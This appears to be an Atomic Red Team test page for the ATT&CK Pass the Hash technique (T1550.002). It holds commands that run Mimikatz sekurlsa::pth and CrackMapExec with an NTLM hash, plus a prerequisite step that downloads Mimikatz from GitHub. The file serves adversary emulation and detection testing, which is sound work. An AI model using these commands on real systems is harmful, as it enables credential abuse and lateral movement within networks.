Skip to content

Latest commit

 

History

History
108 lines (66 loc) · 3.63 KB

T1550.002.md

File metadata and controls

108 lines (66 loc) · 3.63 KB
Raw

T1550.002 - Pass the Hash

Description from ATT&CK

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting)

Atomic Tests


Atomic Test #1 - Mimikatz Pass the Hash

Note: must dump hashes first Reference

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
user_name username string Administrator
ntlm ntlm hash string cc36cf7a8514893efccd3324464tkg1a
domain domain string atomic.local
mimikatz_path mimikatz windows executable Path %tmp%\mimikatz\x64\mimikatz.exe

Attack Commands: Run with command_prompt!

#{mimikatz_path} sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}

Dependencies: Run with powershell!

Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
Check Prereq Commands:
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
Get Prereq Commands:
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force


Atomic Test #2 - crackmapexec Pass the Hash

command execute with crackmapexec

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
user_name username string Administrator
crackmapexec_exe crackmapexec windows executable Path C:\CrackMapExecWin\crackmapexec.exe
command command to execute string whoami
ntlm command string cc36cf7a8514893efccd3324464tkg1a
domain domain string atomic.local

Attack Commands: Run with command_prompt!

crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}

Dependencies: Run with powershell!

Description: CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
Check Prereq Commands:
if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
Get Prereq Commands:
Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}